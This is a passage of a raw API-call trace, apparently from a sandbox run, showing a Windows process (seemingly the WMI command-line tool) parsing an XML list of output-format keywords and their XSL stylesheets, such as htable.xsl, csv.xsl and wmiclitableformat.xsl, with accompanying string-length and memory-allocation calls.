[0292.638] SysStringLen (param_1="TABLE") returned 0x5 [0292.638] malloc (_Size=0x18) returned 0x3422d40 [0292.639] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.639] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.639] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.639] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=3, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.639] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="rawxml.xsl") returned 0x0 [0292.639] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.639] malloc (_Size=0xc) returned 0x3429970 [0292.639] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.639] free (_Block=0x3429970) [0292.639] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0292.639] malloc (_Size=0xc) returned 0x3429898 [0292.640] malloc (_Size=0xc) returned 0x3429928 [0292.640] SysStringLen (param_1="RAWXML") returned 0x6 [0292.640] SysStringLen (param_1="TABLE") returned 0x5 [0292.640] SysStringLen (param_1="RAWXML") returned 0x6 [0292.640] SysStringLen (param_1="LIST") returned 0x4 [0292.640] SysStringLen (param_1="LIST") returned 0x4 [0292.640] SysStringLen (param_1="RAWXML") returned 0x6 [0292.640] malloc (_Size=0x18) returned 0x3422c00 [0292.640] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.640] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.640] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.641] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=4, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.641] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="htable.xsl") returned 0x0 [0292.641] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.641] malloc (_Size=0xc) returned 0x3429970 [0292.641] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.641] free (_Block=0x3429970) [0292.641] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0292.641] malloc (_Size=0xc) returned 0x34298e0 [0292.641] malloc (_Size=0xc) returned 0x3429940 [0292.641] SysStringLen (param_1="HTABLE") returned 0x6 [0292.641] SysStringLen (param_1="TABLE") returned 0x5 [0292.641] SysStringLen (param_1="HTABLE") returned 0x6 [0292.641] SysStringLen (param_1="LIST") returned 0x4 [0292.642] malloc (_Size=0x18) returned 0x3422bc0 [0292.642] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.642] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.642] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.642] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=5, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.642] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="hform.xsl") returned 0x0 [0292.642] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.642] malloc (_Size=0xc) returned 0x3429838 [0292.642] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.642] free (_Block=0x3429838) [0292.643] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0292.643] malloc (_Size=0xc) returned 0x3429868 [0292.643] malloc (_Size=0xc) returned 0x3429988 [0292.643] SysStringLen (param_1="HFORM") returned 0x5 [0292.643] SysStringLen (param_1="TABLE") returned 0x5 [0292.643] SysStringLen (param_1="HFORM") returned 0x5 [0292.643] SysStringLen (param_1="LIST") returned 0x4 [0292.643] SysStringLen (param_1="HFORM") returned 0x5 [0292.643] SysStringLen (param_1="HTABLE") returned 0x6 [0292.643] malloc (_Size=0x18) returned 0x3422c40 [0292.643] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.643] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.643] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.643] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=6, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.643] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="xml.xsl") returned 0x0 [0292.643] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.644] malloc (_Size=0xc) returned 0x3429820 [0292.644] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.644] free (_Block=0x3429820) [0292.644] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0292.644] malloc (_Size=0xc) returned 0x34297f0 [0292.644] malloc (_Size=0xc) returned 0x3429970 [0292.644] SysStringLen (param_1="XML") returned 0x3 [0292.644] SysStringLen (param_1="TABLE") returned 0x5 [0292.644] SysStringLen (param_1="XML") returned 0x3 [0292.644] SysStringLen (param_1="VALUE") returned 0x5 [0292.644] SysStringLen (param_1="VALUE") returned 0x5 [0292.644] SysStringLen (param_1="XML") returned 0x3 [0292.644] malloc (_Size=0x18) returned 0x3422b00 [0292.644] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.644] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.644] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.645] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=7, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.645] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="mof.xsl") returned 0x0 [0292.645] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.645] malloc (_Size=0xc) returned 0x34298b0 [0292.645] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.645] free (_Block=0x34298b0) [0292.645] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0292.645] malloc (_Size=0xc) returned 0x34298b0 [0292.645] malloc (_Size=0xc) returned 0x34299a0 [0292.645] SysStringLen (param_1="MOF") returned 0x3 [0292.645] SysStringLen (param_1="TABLE") returned 0x5 [0292.645] SysStringLen (param_1="MOF") returned 0x3 [0292.645] SysStringLen (param_1="LIST") returned 0x4 [0292.646] SysStringLen (param_1="MOF") returned 0x3 [0292.646] SysStringLen (param_1="RAWXML") returned 0x6 [0292.646] SysStringLen (param_1="LIST") returned 0x4 [0292.646] SysStringLen (param_1="MOF") returned 0x3 [0292.646] malloc (_Size=0x18) returned 0x3422b20 [0292.646] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.646] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.646] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.646] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=8, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.646] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="csv.xsl") returned 0x0 [0292.646] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.646] malloc (_Size=0xc) returned 0x34299b8 [0292.646] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.647] free (_Block=0x34299b8) [0292.647] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0292.647] malloc (_Size=0xc) returned 0x3429820 [0292.647] malloc (_Size=0xc) returned 0x34299b8 [0292.647] SysStringLen (param_1="CSV") returned 0x3 [0292.647] SysStringLen (param_1="TABLE") returned 0x5 [0292.647] SysStringLen (param_1="CSV") returned 0x3 [0292.647] SysStringLen (param_1="LIST") returned 0x4 [0292.647] SysStringLen (param_1="CSV") returned 0x3 [0292.647] SysStringLen (param_1="HTABLE") returned 0x6 [0292.647] SysStringLen (param_1="CSV") returned 0x3 [0292.647] SysStringLen (param_1="HFORM") returned 0x5 [0292.647] malloc (_Size=0x18) returned 0x3422a60 [0292.647] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.647] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.647] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.647] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=9, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.647] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.648] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.648] malloc (_Size=0xc) returned 0x3429838 [0292.648] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.648] free (_Block=0x3429838) [0292.648] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0292.648] malloc (_Size=0xc) returned 0x3429838 [0292.648] malloc (_Size=0xc) returned 0x342ad98 [0292.648] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.648] SysStringLen (param_1="TABLE") returned 0x5 [0292.648] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.648] SysStringLen (param_1="VALUE") returned 0x5 [0292.648] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.648] SysStringLen (param_1="XML") returned 0x3 [0292.648] SysStringLen (param_1="XML") returned 0x3 [0292.648] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.648] malloc (_Size=0x18) returned 0x3422ba0 [0292.649] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.649] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.649] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.649] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=10, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.649] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.649] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.649] malloc (_Size=0xc) returned 0x342ad08 [0292.649] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.649] free (_Block=0x342ad08) [0292.649] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0292.649] malloc (_Size=0xc) returned 0x342ab58 [0292.650] malloc (_Size=0xc) returned 0x342ab40 [0292.650] SysStringLen (param_1="texttablewsys") returned 0xd [0292.650] SysStringLen (param_1="TABLE") returned 0x5 [0292.650] SysStringLen (param_1="texttablewsys") returned 0xd [0292.650] SysStringLen (param_1="XML") returned 0x3 [0292.650] SysStringLen (param_1="texttablewsys") returned 0xd [0292.650] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.650] SysStringLen (param_1="XML") returned 0x3 [0292.650] SysStringLen (param_1="texttablewsys") returned 0xd [0292.650] malloc (_Size=0x18) returned 0x3422be0 [0292.650] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.650] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.650] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.650] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=11, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.650] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.650] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.651] malloc (_Size=0xc) returned 0x342abe8 [0292.651] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.651] free (_Block=0x342abe8) [0292.651] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0292.651] malloc (_Size=0xc) returned 0x342ab10 [0292.651] malloc (_Size=0xc) returned 0x342adb0 [0292.651] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.651] SysStringLen (param_1="TABLE") returned 0x5 [0292.651] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.651] SysStringLen (param_1="XML") returned 0x3 [0292.651] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.651] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.651] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.651] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.651] malloc (_Size=0x18) returned 0x3422b60 [0292.651] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.652] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.652] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.652] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=12, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.652] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.652] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.652] malloc (_Size=0xc) returned 0x342acd8 [0292.652] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.652] free (_Block=0x342acd8) [0292.652] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0292.653] malloc (_Size=0xc) returned 0x342ad50 [0292.653] malloc (_Size=0xc) returned 0x342ac30 [0292.653] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.653] SysStringLen (param_1="TABLE") returned 0x5 [0292.653] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.653] SysStringLen (param_1="XML") returned 0x3 [0292.653] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.653] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.653] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.653] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.653] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.653] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.653] malloc (_Size=0x18) returned 0x3422a80 [0292.653] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.653] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.653] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.653] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=13, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.654] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.654] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.654] malloc (_Size=0xc) returned 0x342ac48 [0292.654] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.654] free (_Block=0x342ac48) [0292.654] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0292.654] malloc (_Size=0xc) returned 0x342ad80 [0292.654] malloc (_Size=0xc) returned 0x342acf0 [0292.654] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.654] SysStringLen (param_1="TABLE") returned 0x5 [0292.654] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.654] SysStringLen (param_1="XML") returned 0x3 [0292.654] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.654] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.655] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.655] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.655] malloc (_Size=0x18) returned 0x3422b80 [0292.655] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.655] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.655] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.655] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=14, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.655] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="texttable.xsl") returned 0x0 [0292.655] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.655] malloc (_Size=0xc) returned 0x342ab88 [0292.655] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.656] free (_Block=0x342ab88) [0292.657] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0292.657] malloc (_Size=0xc) returned 0x342abe8 [0292.657] malloc (_Size=0xc) returned 0x342adf8 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] SysStringLen (param_1="TABLE") returned 0x5 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] SysStringLen (param_1="XML") returned 0x3 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.657] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0292.657] malloc (_Size=0x18) returned 0x3422ac0 [0292.657] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.657] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.657] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.657] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=15, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.658] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="htable.xsl") returned 0x0 [0292.658] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.658] malloc (_Size=0xc) returned 0x342ac00 [0292.658] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.658] free (_Block=0x342ac00) [0292.658] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0292.658] malloc (_Size=0xc) returned 0x342ad08 [0292.658] malloc (_Size=0xc) returned 0x342ab70 [0292.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.658] SysStringLen (param_1="TABLE") returned 0x5 [0292.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.658] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.658] SysStringLen (param_1="XML") returned 0x3 [0292.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.659] SysStringLen (param_1="texttablewsys") returned 0xd [0292.659] SysStringLen (param_1="XML") returned 0x3 [0292.659] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.659] malloc (_Size=0x18) returned 0x3422c60 [0292.659] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.659] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.659] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.659] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=16, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.659] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="htable.xsl") returned 0x0 [0292.659] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.659] malloc (_Size=0xc) returned 0x342adc8 [0292.659] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.660] free (_Block=0x342adc8) [0292.660] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0292.660] malloc (_Size=0xc) returned 0x342abd0 [0292.660] malloc (_Size=0xc) returned 0x342ac78 [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] SysStringLen (param_1="TABLE") returned 0x5 [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] SysStringLen (param_1="XML") returned 0x3 [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] SysStringLen (param_1="texttablewsys") returned 0xd [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0292.660] SysStringLen (param_1="XML") returned 0x3 [0292.660] SysStringLen (param_1="htable-sortby") returned 0xd [0292.660] malloc (_Size=0x18) returned 0x3422c20 [0292.660] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.660] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.660] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.661] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=17, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.661] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="mof.xsl") returned 0x0 [0292.661] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.661] malloc (_Size=0xc) returned 0x342ac90 [0292.661] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.661] free (_Block=0x342ac90) [0292.661] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0292.661] malloc (_Size=0xc) returned 0x342ab88 [0292.661] malloc (_Size=0xc) returned 0x342adc8 [0292.661] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.661] SysStringLen (param_1="TABLE") returned 0x5 [0292.661] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.661] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.661] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.661] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.662] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.662] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.662] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.662] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.662] malloc (_Size=0x18) returned 0x3422d00 [0292.662] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.662] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.662] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.662] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=18, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.662] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="mof.xsl") returned 0x0 [0292.662] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.662] malloc (_Size=0xc) returned 0x342aca8 